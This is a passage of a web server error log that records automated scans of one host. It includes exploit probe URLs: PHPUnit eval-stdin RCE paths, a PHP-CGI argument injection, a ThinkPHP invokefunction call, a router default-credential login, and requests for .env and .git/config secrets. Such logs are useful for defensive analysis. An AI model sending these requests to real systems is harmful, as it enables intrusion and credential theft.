such file or directory), client: 78.153.140.151, server: localhost-nginx-proxy-manager, request: "GET /app/config/parameters.yml HTTP/1.1", host: "91.82.83.208" +2026/01/20 18:38:36 [error] 208#208: *2353 open() "/var/www/html/exapi/.env" failed (2: No such file or directory), client: 78.153.140.151, server: localhost-nginx-proxy-manager, request: "GET /exapi/.env HTTP/1.1", host: "91.82.83.208" +2026/01/20 18:46:08 [error] 208#208: *2367 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 5.187.35.158, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.83.208:80" +2026/01/20 19:07:02 [error] 207#207: *3890 open() "/var/www/html/geoserver/wfs" failed (2: No such file or directory), client: 204.76.203.8, server: localhost-nginx-proxy-manager, request: "GET /geoserver/wfs?request=ListStoredQueries&service=wfs&version=2.0.0 HTTP/1.1", host: "91.82.83.208:80" +2026/01/20 19:07:57 [error] 207#207: *3892 "/var/www/html/bins/index.html" is not found (2: No such file or directory), client: 204.76.203.18, server: localhost-nginx-proxy-manager, request: "GET /bins/ HTTP/1.1", host: "91.82.83.208:80" +2026/01/20 19:09:05 [error] 207#207: *3899 open() "/var/www/html/goform/formJsonAjaxReq" failed (2: No such file or directory), client: 91.224.92.14, server: localhost-nginx-proxy-manager, request: "POST /goform/formJsonAjaxReq HTTP/1.1", host: "91.82.83.208", referrer: "http://91.82.83.208/home.asp" +2026/01/20 19:39:06 [error] 251#251: *5739 open() "/var/www/html/geoserver/wfs" failed (2: No such file or directory), client: 204.76.203.8, server: localhost-nginx-proxy-manager, request: "GET /geoserver/wfs?request=ListStoredQueries&service=wfs&version=2.0.0 HTTP/1.1", host: "91.82.83.208:80" +2026/01/20 19:40:44 [error] 251#251: *5743 open() "/var/www/html/actuator/health" failed (2: No such file or directory), client: 20.106.56.125, server: localhost-nginx-proxy-manager, request: "GET /actuator/health HTTP/1.1", host: "91.82.83.208" +2026/01/20 19:47:51 [error] 252#252: *6036 open() "/var/www/html/goform/formJsonAjaxReq" failed (2: No such file or directory), client: 91.224.92.14, server: localhost-nginx-proxy-manager, request: "POST /goform/formJsonAjaxReq HTTP/1.1", host: "91.82.83.208", referrer: "http://91.82.83.208/home.asp" +2026/01/20 20:34:17 [error] 252#252: *6138 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 89.42.231.200, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.83.208:80" +2026/01/20 20:50:53 [error] 253#253: *6170 open() "/var/www/html/geoserver/wfs" failed (2: No such file or directory), client: 204.76.203.8, server: localhost-nginx-proxy-manager, request: "GET /geoserver/wfs?request=ListStoredQueries&service=wfs&version=2.0.0 HTTP/1.1", host: "91.82.83.208:80" +2026/01/20 21:05:46 [error] 253#253: *6211 open() "/var/www/html/.env" failed (2: No such file or directory), client: 195.177.94.73, server: localhost-nginx-proxy-manager, request: "GET /.env HTTP/1.1", host: "91.82.83.208" +2026/01/20 21:17:18 [error] 253#253: *6226 open() "/var/www/html/geoserver/wfs" failed (2: No such file or directory), client: 204.76.203.8, server: localhost-nginx-proxy-manager, request: "GET /geoserver/wfs?request=ListStoredQueries&service=wfs&version=2.0.0 HTTP/1.1", host: "91.82.83.208:80" +2026/01/20 21:18:55 [error] 253#253: *6229 open() "/var/www/html/.git/config" failed (2: No such file or directory), client: 195.177.94.73, server: localhost-nginx-proxy-manager, request: "GET /.git/config HTTP/1.1", host: "91.82.83.208" +2026/01/20 21:20:38 [error] 253#253: *6232 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 89.42.231.200, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.83.208:80" +2026/01/20 21:33:15 [error] 253#253: *6257 "/var/www/html/bin/index.html" is not found (2: No such file or directory), client: 204.76.203.18, server: localhost-nginx-proxy-manager, request: "GET /bin/ HTTP/1.1", host: "91.82.83.208:80" +2026/01/20 21:45:53 [error] 250#250: *6280 open() "/var/www/html/geoserver/wfs" failed (2: No such file or directory), client: 204.76.203.8, server: localhost-nginx-proxy-manager, request: "GET /geoserver/wfs?request=ListStoredQueries&service=wfs&version=2.0.0 HTTP/1.1", host: "91.82.83.208:80" +2026/01/20 21:54:45 [error] 250#250: *6292 open() "/var/www/html/hello.world" failed (2: No such file or directory), client: 103.232.121.71, server: localhost-nginx-proxy-manager, request: "POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1", host: "91.82.83.208:80" +2026/01/20 21:54:46 [error] 250#250: *6292 open() "/var/www/html/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 103.232.121.71, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/20 21:54:47 [error] 250#250: *6292 open() "/var/www/html/vendor/phpunit/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 103.232.121.71, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/20 21:54:47 [error] 250#250: *6292 open() "/var/www/html/vendor/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 103.232.121.71, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/20 21:54:48 [error] 250#250: *6292 open() "/var/www/html/vendor/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 103.232.121.71, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/20 21:54:48 [error] 250#250: *6292 open() "/var/www/html/vendor/phpunit/phpunit/LICENSE/eval-stdin.php" failed (2: No such file or directory), client: 103.232.121.71, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/phpunit/LICENSE/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/20 21:54:49 [error] 250#250: *6292 open() "/var/www/html/vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 103.232.121.71, server: localhost-nginx-proxy-manager, request: "GET /vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/20 21:54:49 [error] 250#250: *6292 open() "/var/www/html/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 103.232.121.71, server: localhost-nginx-proxy-manager, request: "GET /phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/20 21:54:49 [error] 250#250: *6292 open() "/var/www/html/phpunit/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 103.232.121.71, server: localhost-nginx-proxy-manager, request: "GET /phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/20 21:54:50 [error] 250#250: *6292 open() "/var/www/html/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 103.232.121.71, server: localhost-nginx-proxy-manager, request: "GET /phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/20 21:54:50 [error] 250#250: *6292 open() "/var/www/html/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 103.232.121.71, server: localhost-nginx-proxy-manager, request: "GET /phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/20 21:54:51 [error] 250#250: *6292 open() "/var/www/html/lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 103.232.121.71, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/20 21:54:51 [error] 250#250: *6292 open() "/var/www/html/lib/phpunit/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 103.232.121.71, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/20 21:54:52 [error] 250#250: *6292 open() "/var/www/html/lib/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 103.232.121.71, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/20 21:54:52 [error] 250#250: *6292 open() "/var/www/html/lib/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 103.232.121.71, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/20 21:54:53 [error] 250#250: *6292 open() "/var/www/html/lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 103.232.121.71, server: localhost-nginx-proxy-manager, request: "GET /lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/20 21:54:53 [error] 250#250: *6292 open() "/var/www/html/laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 103.232.121.71, server: localhost-nginx-proxy-manager, request: "GET /laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/20 21:54:54 [error] 250#250: *6292 open() "/var/www/html/www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 103.232.121.71, server: localhost-nginx-proxy-manager, request: "GET /www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/20 21:54:54 [error] 250#250: *6292 open() "/var/www/html/ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 103.232.121.71, server: localhost-nginx-proxy-manager, request: "GET /ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/20 21:54:55 [error] 250#250: *6292 open() "/var/www/html/yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 103.232.121.71, server: localhost-nginx-proxy-manager, request: "GET /yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/20 21:54:56 [error] 250#250: *6292 open() "/var/www/html/zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 103.232.121.71, server: localhost-nginx-proxy-manager, request: "GET /zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/20 21:54:56 [error] 250#250: *6292 open() "/var/www/html/ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 103.232.121.71, server: localhost-nginx-proxy-manager, request: "GET /ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/20 21:54:56 [error] 250#250: *6292 open() "/var/www/html/V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 103.232.121.71, server: localhost-nginx-proxy-manager, request: "GET /V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/20 21:54:57 [error] 250#250: *6292 open() "/var/www/html/tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 103.232.121.71, server: localhost-nginx-proxy-manager, request: "GET /tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/20 21:54:57 [error] 250#250: *6292 open() "/var/www/html/test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 103.232.121.71, server: localhost-nginx-proxy-manager, request: "GET /test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/20 21:54:58 [error] 250#250: *6292 open() "/var/www/html/testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 103.232.121.71, server: localhost-nginx-proxy-manager, request: "GET /testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/20 21:54:58 [error] 250#250: *6292 open() "/var/www/html/api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 103.232.121.71, server: localhost-nginx-proxy-manager, request: "GET /api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/20 21:54:59 [error] 250#250: *6292 open() "/var/www/html/demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 103.232.121.71, server: localhost-nginx-proxy-manager, request: "GET /demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/20 21:54:59 [error] 250#250: *6292 open() "/var/www/html/cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 103.232.121.71, server: localhost-nginx-proxy-manager, request: "GET /cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/20 21:55:00 [error] 250#250: *6292 open() "/var/www/html/crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 103.232.121.71, server: localhost-nginx-proxy-manager, request: "GET /crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/20 21:55:00 [error] 250#250: *6292 open() "/var/www/html/admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 103.232.121.71, server: localhost-nginx-proxy-manager, request: "GET /admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/20 21:55:00 [error] 250#250: *6292 open() "/var/www/html/backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 103.232.121.71, server: localhost-nginx-proxy-manager, request: "GET /backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/20 21:55:01 [error] 250#250: *6292 open() "/var/www/html/blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 103.232.121.71, server: localhost-nginx-proxy-manager, request: "GET /blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/20 21:55:01 [error] 250#250: *6292 open() "/var/www/html/workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 103.232.121.71, server: localhost-nginx-proxy-manager, request: "GET /workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/20 21:55:02 [error] 250#250: *6292 open() "/var/www/html/panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 103.232.121.71, server: localhost-nginx-proxy-manager, request: "GET /panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/20 21:55:02 [error] 250#250: *6292 open() "/var/www/html/public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 103.232.121.71, server: localhost-nginx-proxy-manager, request: "GET /public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/20 21:55:03 [error] 250#250: *6292 open() "/var/www/html/apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 103.232.121.71, server: localhost-nginx-proxy-manager, request: "GET /apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/20 21:55:04 [error] 250#250: *6292 open() "/var/www/html/app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 103.232.121.71, server: localhost-nginx-proxy-manager, request: "GET /app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/20 21:55:04 [error] 250#250: *6292 open() "/var/www/html/index.php" failed (2: No such file or directory), client: 103.232.121.71, server: localhost-nginx-proxy-manager, request: "GET /index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1", host: "91.82.83.208:80" +2026/01/20 21:55:05 [error] 250#250: *6292 open() "/var/www/html/public/index.php" failed (2: No such file or directory), client: 103.232.121.71, server: localhost-nginx-proxy-manager, request: "GET /public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1", host: "91.82.83.208:80" +2026/01/20 21:55:06 [error] 250#250: *6292 open() "/var/www/html/containers/json" failed (2: No such file or directory), client: 103.232.121.71, server: localhost-nginx-proxy-manager, request: "GET /containers/json HTTP/1.1", host: "91.82.83.208:80" +2026/01/20 22:08:53 [error] 250#250: *6586 open() "/var/www/html/.env" failed (2: No such file or directory), client: 45.156.87.161, server: localhost-nginx-proxy-manager, request: "GET /.env HTTP/1.1", host: "91.82.83.208" +2026/01/20 22:54:36 [error] 257#257: *6696 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 89.42.231.200, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.83.208:80" +2026/01/20 23:19:49 [error] 260#260: *6743 open() "/var/www/html/geoserver/wfs" failed (2: No such file or directory), client: 204.76.203.8, server: localhost-nginx-proxy-manager, request: "GET /geoserver/wfs?request=ListStoredQueries&service=wfs&version=2.0.0 HTTP/1.1", host: "91.82.83.208:80" +2026/01/20 23:40:28 [error] 257#257: *6769 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 89.42.231.200, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.83.208:80" +2026/01/20 23:45:59 [error] 259#259: *8290 open() "/var/www/html/.well-known/security.txt" failed (2: No such file or directory), client: 66.132.153.117, server: localhost-nginx-proxy-manager, request: "GET /.well-known/security.txt HTTP/1.1", host: "91.82.83.208" +2026/01/20 23:56:41 [error] 260#260: *8304 open() "/var/www/html/.env" failed (2: No such file or directory), client: 157.245.196.205, server: localhost-nginx-proxy-manager, request: "GET /.env HTTP/1.1", host: "91.82.83.208" +2026/01/20 23:56:42 [error] 260#260: *8305 open() "/var/www/html/.git/config" failed (2: No such file or directory), client: 157.245.196.205, server: localhost-nginx-proxy-manager, request: "GET /.git/config HTTP/1.1", host: "91.82.83.208" +2026/01/20 23:57:37 [error] 260#260: *8306 open() "/var/www/html/geoserver/wfs" failed (2: No such file or directory), client: 204.76.203.8, server: localhost-nginx-proxy-manager, request: "GET /geoserver/wfs?request=ListStoredQueries&service=wfs&version=2.0.0 HTTP/1.1", host: "91.82.83.208:80" +2026/01/21 00:21:58 [error] 257#257: *10203 open() "/var/www/html/geoserver/wfs" failed (2: No such file or directory), client: 204.76.203.8, server: localhost-nginx-proxy-manager, request: "GET /geoserver/wfs?request=ListStoredQueries&service=wfs&version=2.0.0 HTTP/1.1", host: "91.82.83.208:80" +2026/01/21 00:40:29 [error] 258#258: *10226 open() "/var/www/html/actuator/gateway/routes" failed (2: No such file or directory), client: 79.124.40.174, server: localhost-nginx-proxy-manager, request: "GET /actuator/gateway/routes HTTP/1.1", host: "91.82.83.208:80" +2026/01/21 00:54:26 [error] 258#258: *10264 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 5.61.209.92, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.83.208:80" +2026/01/21 01:13:57 [error] 259#259: *10290 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 89.42.231.200, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.83.208:80" +2026/01/21 01:39:06 [error] 260#260: *12620 open() "/var/www/html/geoserver/wfs" failed (2: No such file or directory), client: 204.76.203.8, server: localhost-nginx-proxy-manager, request: "GET /geoserver/wfs?request=ListStoredQueries&service=wfs&version=2.0.0 HTTP/1.1", host: "91.82.83.208:80" +2026/01/21 02:00:00 [error] 260#260: *12641 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 89.42.231.200, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.83.208:80" +2026/01/21 02:08:59 [error] 260#260: *12664 open() "/var/www/html/geoserver/wfs" failed (2: No such file or directory), client: 204.76.203.8, server: localhost-nginx-proxy-manager, request: "GET /geoserver/wfs?request=ListStoredQueries&service=wfs&version=2.0.0 HTTP/1.1", host: "91.82.83.208:80" +2026/01/21 02:22:07 [error] 257#257: *12681 "/var/www/html/backup/index.html" is not found (2: No such file or directory), client: 204.76.203.18, server: localhost-nginx-proxy-manager, request: "GET /backup/ HTTP/1.1", host: "91.82.83.208:80" +2026/01/21 02:42:45 [error] 257#257: *12717 open() "/var/www/html/geoserver/wfs" failed (2: No such file or directory), client: 204.76.203.8, server: localhost-nginx-proxy-manager, request: "GET /geoserver/wfs?request=ListStoredQueries&service=wfs&version=2.0.0 HTTP/1.1", host: "91.82.83.208:80" +2026/01/21 02:44:20 [error] 259#259: *14210 open() "/var/www/html/robots.txt" failed (2: No such file or directory), client: 152.32.207.150, server: localhost-nginx-proxy-manager, request: "GET /robots.txt HTTP/1.1", host: "91.82.83.208" +2026/01/21 02:44:20 [error] 259#259: *14211 open() "/var/www/html/sitemap.xml" failed (2: No such file or directory), client: 152.32.207.150, server: localhost-nginx-proxy-manager, request: "GET /sitemap.xml HTTP/1.1", host: "91.82.83.208" +2026/01/21 02:44:21 [error] 259#259: *14212 open() "/var/www/html/config.json" failed (2: No such file or directory), client: 152.32.207.150, server: localhost-nginx-proxy-manager, request: "GET /config.json HTTP/1.1", host: "91.82.83.208" +2026/01/21 02:45:40 [error] 259#259: *14214 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 89.42.231.200, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.83.208:80" +2026/01/21 03:07:24 [error] 260#260: *14232 open() "/var/www/html/boaform/admin/formLogin" failed (2: No such file or directory), client: 182.119.5.101, server: localhost-nginx-proxy-manager, request: "GET /boaform/admin/formLogin?username=adminisp&psd=adminisp HTTP/1.0" +2026/01/21 03:19:16 [error] 260#260: *14247 open() "/var/www/html/geoserver/wfs" failed (2: No such file or directory), client: 204.76.203.8, server: localhost-nginx-proxy-manager, request: "GET /geoserver/wfs?request=ListStoredQueries&service=wfs&version=2.0.0 HTTP/1.1", host: "91.82.83.208:80" +2026/01/21 03:31:45 [error] 257#257: *14268 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 89.42.231.200, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.83.208:80" +2026/01/21 03:43:26 [error] 257#257: *14309 open() "/var/www/html/geoserver/wfs" failed (2: No such file or directory), client: 204.76.203.8, server: localhost-nginx-proxy-manager, request: "GET /geoserver/wfs?request=ListStoredQueries&service=wfs&version=2.0.0 HTTP/1.1", host: "91.82.83.208:80" +2026/01/21 04:45:07 [error] 258#258: *14392 open() "/var/www/html/geoserver/wfs" failed (2: No such file or directory), client: 204.76.203.8, server: localhost-nginx-proxy-manager, request: "GET /geoserver/wfs?request=ListStoredQueries&service=wfs&version=2.0.0 HTTP/1.1", host: "91.82.83.208:80" +2026/01/21 04:48:02 [error] 258#258: *14396 open() "/var/www/html/manager/html" failed (2: No such file or directory), client: 84.105.19.130, server: localhost-nginx-proxy-manager, request: "GET /manager/html HTTP/1.1", host: "91.82.83.208" +2026/01/21 05:05:11 [error] 265#265: *14416 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 89.42.231.200, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.83.208:80" +2026/01/21 05:06:04 [error] 266#266: *14417 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 89.42.231.200, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.83.208:80" +2026/01/21 05:24:12 [error] 264#264: *14432 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 5.61.209.92, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.83.208:80" +2026/01/21 05:28:48 [error] 264#264: *14438 open() "/var/www/html/geoserver/wfs" failed (2: No such file or directory), client: 204.76.203.8, server: localhost-nginx-proxy-manager, request: "GET /geoserver/wfs?request=ListStoredQueries&service=wfs&version=2.0.0 HTTP/1.1", host: "91.82.83.208:80" +2026/01/21 05:42:44 [error] 264#264: *14449 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 204.76.203.6, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.83.208:80" +2026/01/21 06:12:22 [error] 264#264: *14482 open() "/var/www/html/cgi-bin/luci/;stok=/locale" failed (2: No such file or directory), client: 91.224.92.115, server: localhost-nginx-proxy-manager, request: "GET /cgi-bin/luci/;stok=/locale HTTP/1.1", host: "91.82.83.208:80" +2026/01/21 06:15:48 [error] 264#264: *14485 open() "/var/www/html/login" failed (2: No such file or directory), client: 144.31.215.41, server: localhost-nginx-proxy-manager, request: "GET /login HTTP/1.1", host: "91.82.83.208:80" +2026/01/21 06:15:59 [error] 265#265: *14489 open() "/var/www/html/geoserver/wfs" failed (2: No such file or directory), client: 204.76.203.8, server: localhost-nginx-proxy-manager, request: "GET /geoserver/wfs?request=ListStoredQueries&service=wfs&version=2.0.0 HTTP/1.1", host: "91.82.83.208:80" +2026/01/21 06:39:44 [error] 265#265: *14521 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 89.42.231.200, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.83.208:80" +2026/01/21 06:49:09 [error] 265#265: *14538 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 5.183.209.196, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.83.208:80" +2026/01/21 06:58:10 [error] 265#265: *14546 open() "/var/www/html/geoserver/wfs" failed (2: No such file or directory), client: 204.76.203.8, server: localhost-nginx-proxy-manager, request: "GET /geoserver/wfs?request=ListStoredQueries&service=wfs&version=2.0.0 HTTP/1.1", host: "91.82.83.208:80" +2026/01/21 07:31:50 [error] 266#266: *14635 open() "/var/www/html/geoserver/wfs" failed (2: No such file or directory), client: 204.76.203.8, server: localhost-nginx-proxy-manager, request: "GET /geoserver/wfs?request=ListStoredQueries&service=wfs&version=2.0.0 HTTP/1.1", host: "91.82.83.208:80" +2026/01/21 08:12:50 [error] 266#266: *14693 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 89.42.231.200, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.83.208:80" +2026/01/21 08:41:38 [error] 267#267: *14723 "/var/www/html/webui/index.html" is not found (2: No such file or directory), client: 65.49.20.69, server: localhost-nginx-proxy-manager, request: "GET /webui/ HTTP/1.1", host: "91.82.83.208" +2026/01/21 08:44:05 [error] 265#265: *16213 "/var/www/html/geoserver/web/index.html" is not found (2: No such file or directory), client: 65.49.20.69, server: localhost-nginx-proxy-manager, request: "GET /geoserver/web/ HTTP/1.1", host: "91.82.83.208" +2026/01/21 09:29:59 [error] 266#266: *16255 open() "/var/www/html/wp-content/plugins/hellopress/wp_filemanager.php" failed (2: No such file or directory), client: 4.197.167.136, server: localhost-nginx-proxy-manager, request: "GET /wp-content/plugins/hellopress/wp_filemanager.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/21 09:29:59 [error] 266#266: *16255 open() "/var/www/html/class.php" failed (2: No such file or directory), client: 4.197.167.136, server: localhost-nginx-proxy-manager, request: "GET /class.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/21 09:29:59 [error] 266#266: *16255 open() "/var/www/html/lm13.php" failed (2: No such file or directory), client: 4.197.167.136, server: localhost-nginx-proxy-manager, request: "GET /lm13.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/21 09:30:00 [error] 266#266: *16255 open() "/var/www/html/1aa.php" failed (2: No such file or directory), client: 4.197.167.136, server: localhost-nginx-proxy-manager, request: "GET /1aa.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/21 09:30:00 [error] 266#266: *16255 open() "/var/www/html/menu.php" failed (2: No such file or directory), client: 4.197.167.136, server: localhost-nginx-proxy-manager, request: "GET /menu.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/21 09:30:00 [error] 266#266: *16255 open() "/var/www/html/mail.php" failed 